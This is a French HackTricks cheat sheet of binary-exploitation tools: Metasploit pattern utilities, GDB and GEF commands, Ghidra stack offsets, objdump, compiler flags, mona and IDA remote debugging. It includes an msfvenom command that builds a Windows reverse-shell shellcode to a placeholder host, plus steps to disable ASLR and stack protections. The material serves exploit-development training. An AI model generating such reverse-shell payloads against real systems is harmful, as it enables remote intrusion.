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# Outils d'Exploitation
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{{#include ../../../banners/hacktricks-training.md}}
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## Metasploit
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```bash
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pattern_create.rb -l 3000 #Length
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pattern_offset.rb -l 3000 -q 5f97d534 #Search offset
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nasm_shell.rb
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nasm> jmp esp #Get opcodes
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msfelfscan -j esi /opt/fusion/bin/level01
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```
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### Shellcodes
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```bash
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msfvenom /p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> [EXITFUNC=thread] [-e x86/shikata_ga_nai] -b "\x00\x0a\x0d" -f c
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```
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## GDB
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### Installer
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```bash
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apt-get install gdb
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```
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### Paramètres
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```bash
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-q # No show banner
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-x <file> # Auto-execute GDB instructions from here
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-p <pid> # Attach to process
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```
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### Instructions
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```bash
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run # Execute
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start # Start and break in main
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n/next/ni # Execute next instruction (no inside)
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s/step/si # Execute next instruction
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c/continue # Continue until next breakpoint
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p system # Find the address of the system function
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set $eip = 0x12345678 # Change value of $eip
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help # Get help
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quit # exit
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# Disassemble
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disassemble main # Disassemble the function called main
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disassemble 0x12345678 # Disassemble taht address
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set disassembly-flavor intel # Use intel syntax
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set follow-fork-mode child/parent # Follow child/parent process
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# Breakpoints
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br func # Add breakpoint to function
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br *func+23
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br *0x12345678
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del <NUM> # Delete that number of breakpoint
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watch EXPRESSION # Break if the value changes
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# info
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info functions --> Info abount functions
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info functions func --> Info of the funtion
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info registers --> Value of the registers
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bt # Backtrace Stack
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bt full # Detailed stack
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print variable
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print 0x87654321 - 0x12345678 # Caculate
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# x/examine
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examine/<num><o/x/d/u/t/i/s/c><b/h/w/g> dir_mem/reg/puntero # Shows content of <num> in <octal/hexa/decimal/unsigned/bin/instruction/ascii/char> where each entry is a <Byte/half word (2B)/Word (4B)/Giant word (8B)>
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x/o 0xDir_hex
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x/2x $eip # 2Words from EIP
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x/2x $eip -4 # $eip - 4
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x/8xb $eip # 8 bytes (b-> byte, h-> 2bytes, w-> 4bytes, g-> 8bytes)
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i r eip # Value of $eip
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x/w pointer # Value of the pointer
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x/s pointer # String pointed by the pointer
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x/xw &pointer # Address where the pointer is located
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x/i $eip # Instructions of the EIP
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```
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### [GEF](https://github.com/hugsy/gef)
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Vous pouvez éventuellement utiliser [**ce fork de GE**](https://github.com/bata24/gef)[**F**](https://github.com/bata24/gef) qui contient des instructions plus intéressantes.
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```bash
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help memory # Get help on memory command
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canary # Search for canary value in memory
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checksec #Check protections
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p system #Find system function address
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search-pattern "/bin/sh" #Search in the process memory
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vmmap #Get memory mappings
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xinfo <addr> # Shows page, size, perms, memory area and offset of the addr in the page
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memory watch 0x784000 0x1000 byte #Add a view always showinf this memory
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got #Check got table
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memory watch $_got()+0x18 5 #Watch a part of the got table
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# Vulns detection
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format-string-helper #Detect insecure format strings
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heap-analysis-helper #Checks allocation and deallocations of memory chunks:NULL free, UAF,double free, heap overlap
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#Patterns
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pattern create 200 #Generate length 200 pattern
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pattern search "avaaawaa" #Search for the offset of that substring
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pattern search $rsp #Search the offset given the content of $rsp
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#Shellcode
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shellcode search x86 #Search shellcodes
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shellcode get 61 #Download shellcode number 61
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#Dump memory to file
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dump binary memory /tmp/dump.bin 0x200000000 0x20000c350
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#Another way to get the offset of to the RIP
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1- Put a bp after the function that overwrites the RIP and send a ppatern to ovwerwrite it
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2- ef➤ i f
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Stack level 0, frame at 0x7fffffffddd0:
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rip = 0x400cd3; saved rip = 0x6261617762616176
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called by frame at 0x7fffffffddd8
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Arglist at 0x7fffffffdcf8, args:
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Locals at 0x7fffffffdcf8, Previous frame's sp is 0x7fffffffddd0
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Saved registers:
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rbp at 0x7fffffffddc0, rip at 0x7fffffffddc8
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gef➤ pattern search 0x6261617762616176
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[+] Searching for '0x6261617762616176'
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[+] Found at offset 184 (little-endian search) likely
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```
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### Astuces
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#### Adresses identiques dans GDB
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Lors du débogage, GDB aura **des adresses légèrement différentes de celles utilisées par le binaire lors de l'exécution.** Vous pouvez faire en sorte que GDB ait les mêmes adresses en faisant :
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- `unset env LINES`
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- `unset env COLUMNS`
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- `set env _=<path>` _Mettez le chemin absolu vers le binaire_
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- Exploitez le binaire en utilisant le même chemin absolu
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- `PWD` et `OLDPWD` doivent être les mêmes lors de l'utilisation de GDB et lors de l'exploitation du binaire
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#### Backtrace pour trouver les fonctions appelées
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Lorsque vous avez un **binaire lié statiquement**, toutes les fonctions appartiendront au binaire (et non à des bibliothèques externes). Dans ce cas, il sera difficile d'**identifier le flux que suit le binaire pour, par exemple, demander une entrée utilisateur**.\
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Vous pouvez facilement identifier ce flux en **exécutant** le binaire avec **gdb** jusqu'à ce qu'on vous demande une entrée. Ensuite, arrêtez-le avec **CTRL+C** et utilisez la commande **`bt`** (**backtrace**) pour voir les fonctions appelées :
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```
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gef➤ bt
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#0 0x00000000004498ae in ?? ()
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#1 0x0000000000400b90 in ?? ()
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#2 0x0000000000400c1d in ?? ()
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#3 0x00000000004011a9 in ?? ()
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#4 0x0000000000400a5a in ?? ()
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```
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### Serveur GDB
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`gdbserver --multi 0.0.0.0:23947` (dans IDA, vous devez remplir le chemin absolu de l'exécutable sur la machine Linux et sur la machine Windows)
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## Ghidra
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### Trouver l'offset de la pile
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**Ghidra** est très utile pour trouver l'**offset** pour un **débordement de tampon grâce aux informations sur la position des variables locales.**\
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Par exemple, dans l'exemple ci-dessous, un débordement de tampon dans `local_bc` indique que vous avez besoin d'un offset de `0xbc`. De plus, si `local_10` est un cookie canari, cela indique que pour l'écraser depuis `local_bc`, il y a un offset de `0xac`.\
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_Remember que les premiers 0x08 d'où le RIP est sauvegardé appartiennent au RBP._
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.png>)
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## qtool
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```bash
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qltool run -v disasm --no-console --log-file disasm.txt --rootfs ./ ./prog
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```
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Obtenez chaque opcode exécuté dans le programme.
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## GCC
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**gcc -fno-stack-protector -D_FORTIFY_SOURCE=0 -z norelro -z execstack 1.2.c -o 1.2** --> Compiler sans protections\
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**-o** --> Sortie\
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**-g** --> Sauvegarder le code (GDB pourra le voir)\
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**echo 0 > /proc/sys/kernel/randomize_va_space** --> Pour désactiver l'ASLR sous linux
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**Pour compiler un shellcode :**\
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**nasm -f elf assembly.asm** --> retourne un ".o"\
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**ld assembly.o -o shellcodeout** --> Exécutable
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## Objdump
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**-d** --> **Désassembler les** sections exécutables (voir les opcodes d'un shellcode compilé, trouver des gadgets ROP, trouver l'adresse d'une fonction...)\
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**-Mintel** --> **Syntaxe** Intel\
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**-t** --> Table des **symboles**\
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**-D** --> **Désassembler tout** (adresse de variable statique)\
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**-s -j .dtors** --> section dtors\
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**-s -j .got** --> section got\
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-D -s -j .plt --> section **plt** **décompilée**\
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**-TR** --> **Relocalisations**\
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**ojdump -t --dynamic-relo ./exec | grep puts** --> Adresse de "puts" à modifier dans le GOT\
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**objdump -D ./exec | grep "VAR_NAME"** --> Adresse ou une variable statique (celles-ci sont stockées dans la section DATA).
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## Core dumps
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1. Exécutez `ulimit -c unlimited` avant de démarrer mon programme
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2. Exécutez `sudo sysctl -w kernel.core_pattern=/tmp/core-%e.%p.%h.%t`
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3. sudo gdb --core=\<path/core> --quiet
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## Plus
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**ldd executable | grep libc.so.6** --> Adresse (si ASLR, alors cela change à chaque fois)\
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**for i in \`seq 0 20\`; do ldd \<Ejecutable> | grep libc; done** --> Boucle pour voir si l'adresse change beaucoup\
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**readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system** --> Décalage de "system"\
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**strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh** --> Décalage de "/bin/sh"
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**strace executable** --> Fonctions appelées par l'exécutable\
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**rabin2 -i ejecutable -->** Adresse de toutes les fonctions
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## **Inmunity debugger**
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```bash
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!mona modules #Get protections, look for all false except last one (Dll of SO)
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!mona find -s "\xff\xe4" -m name_unsecure.dll #Search for opcodes insie dll space (JMP ESP)
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```
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## IDA
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### Débogage dans linux distant
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À l'intérieur du dossier IDA, vous pouvez trouver des binaires qui peuvent être utilisés pour déboguer un binaire à l'intérieur d'un linux. Pour ce faire, déplacez le binaire `linux_server` ou `linux_server64` à l'intérieur du serveur linux et exécutez-le dans le dossier qui contient le binaire :
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```
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./linux_server64 -Ppass
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```
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Ensuite, configurez le débogueur : Debugger (linux remote) --> Proccess options... :
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.png>)
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{{#include ../../../banners/hacktricks-training.md}}
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